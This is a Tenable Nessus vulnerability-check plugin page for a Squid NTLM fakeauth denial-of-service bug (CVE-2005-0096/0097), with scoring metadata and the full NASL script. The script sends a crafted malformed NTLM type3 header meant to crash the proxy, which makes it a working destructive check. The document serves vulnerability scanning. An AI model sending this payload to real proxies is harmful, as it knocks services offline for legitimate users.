5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.96 High
EPSS
Percentile
99.5%
The remote SQUID server, an open source Proxy server, is vulnerable to a Denial of Service in the fakeauth NTLM authentication module.
Exploitation of this bug can allow remote attackers to deny access to legitimate users.
Squid 2.5*-STABLE are reported vulnerable.
#
# (C) Tenable Network Security, Inc.
#
include( 'compat.inc' );
if (description) {
script_id(16163);
script_version ("1.21");
script_cve_id("CVE-2005-0096", "CVE-2005-0097");
script_bugtraq_id(12220, 12324);
script_name(english:"Squid NTLM Component fakeauth Multiple Remote DoS");
script_summary(english:"Squid Remote NTLM fakeauth Denial of Service");
script_set_attribute(
attribute:'synopsis',
value:'The remote service is vulnerable to a denial of service.'
);
script_set_attribute(
attribute:'description',
value:'The remote SQUID server, an open source Proxy server, is vulnerable
to a Denial of Service in the fakeauth NTLM authentication module.
Exploitation of this bug can allow remote attackers to deny access to
legitimate users.
Squid 2.5*-STABLE are reported vulnerable.'
);
script_set_attribute(
attribute:'solution',
value:'Apply the relevant patch from the vendor advisory.'
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2005-2917");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
# http://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-fakeauth_auth
script_set_attribute(
attribute:'see_also',
value:'http://www.nessus.org/u?af6b5d37'
);
# http://www.squid-cache.org/Versions/v2/2.5/bugs/squid-2.5.STABLE7-fakeauth_auth.patch
script_set_attribute(
attribute:'see_also',
value:'http://www.nessus.org/u?78f21fa1'
);
script_set_attribute(attribute:"plugin_publication_date", value: "2005/01/13");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/01/08");
script_cvs_date("Date: 2019/04/24 9:46:51");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:squid-cache:squid");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Firewalls");
script_dependencies("proxy_use.nasl");
script_require_ports("Services/http_proxy", 8080, 3128);
exit(0);
}
# Keep the old API for that test
include("http_func.inc");
include("misc_func.inc");
# start script
port = get_service(svc:"http_proxy", default: 3128, exit_on_fail: 1);
host = string("http://www.", rand() % 65536, "nessus.test/");
req = string (
"GET " , host , " HTTP/1.1\r\n" ,
"Proxy-Connection: Keep-Alive\r\n" ,
"Host: " , host , "\r\n" ,
"User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n" ,
"Pragma: no-cache\r\n");
type1req = string (req , "Proxy-Authorization: NTLM TlRMTVNTUAABAAAAA7IAAAwADAAsAAAADAAMACAAAABOTkVFU1NTU1VVU1NOTkVFU1NTU1VVU1M=\r\n\r\n");
type3req = string (req , "Proxy-Authorization: NTLM TlRMTVNTUAADAAAAGAAYAGQAAAAYABgAfAAAAAwADABAAAAADAAMAEwAAAAMAAwAWAAAAAAAAADIAAAAAYIAAE5ORUVTU1NTVVVTU05ORUVTU1NTVVVTU05ORUVTU1NTVVVTU0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==\r\n\r\n");
type3req_attack = string (req , "Proxy-Authorization: NTLM TlRMTVNTUAADAAAAGAAYAGQAAAAYABgAfAAAAAwADABAAAAADAAMAEwAAAAMAAwAWAAAAAAAAADIAAAAAYIAAE5ORUVTU1NTVVVTU05ORUVTAFNTVVVTU05ORUVTU1NTVVVTU0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==\r\n\r\n");
soc = open_sock_tcp (port);
if (!soc) exit (0);
# First we send type1 req
send(socket:soc, data:type1req);
r = http_recv(socket:soc);
if (!r) exit(0);
# Checks if SQUID with Proxy-Authenticate: NTLM
if (!egrep(pattern:"^Server: squid/", string:r) || !egrep(pattern:"^Proxy-Authenticate: NTLM", string:r))
exit(0);
# Now type3req
send(socket:soc, data:type3req);
r = http_recv(socket:soc);
if (!r) exit(0);
close (soc);
soc = open_sock_tcp (port);
if (!soc) exit (0);
# We retry with a malicious request
# First we send type1 req
send(socket:soc, data:type1req);
r = http_recv(socket:soc);
if (!r) exit(0);
# Now type3req
send(socket:soc, data:type3req_attack);
r = http_recv(socket:soc);
if (!r)
security_warning( port:port );
close (soc);
Vendor | Product | Version | CPE |
---|---|---|---|
squid-cache | squid | cpe:/a:squid-cache:squid |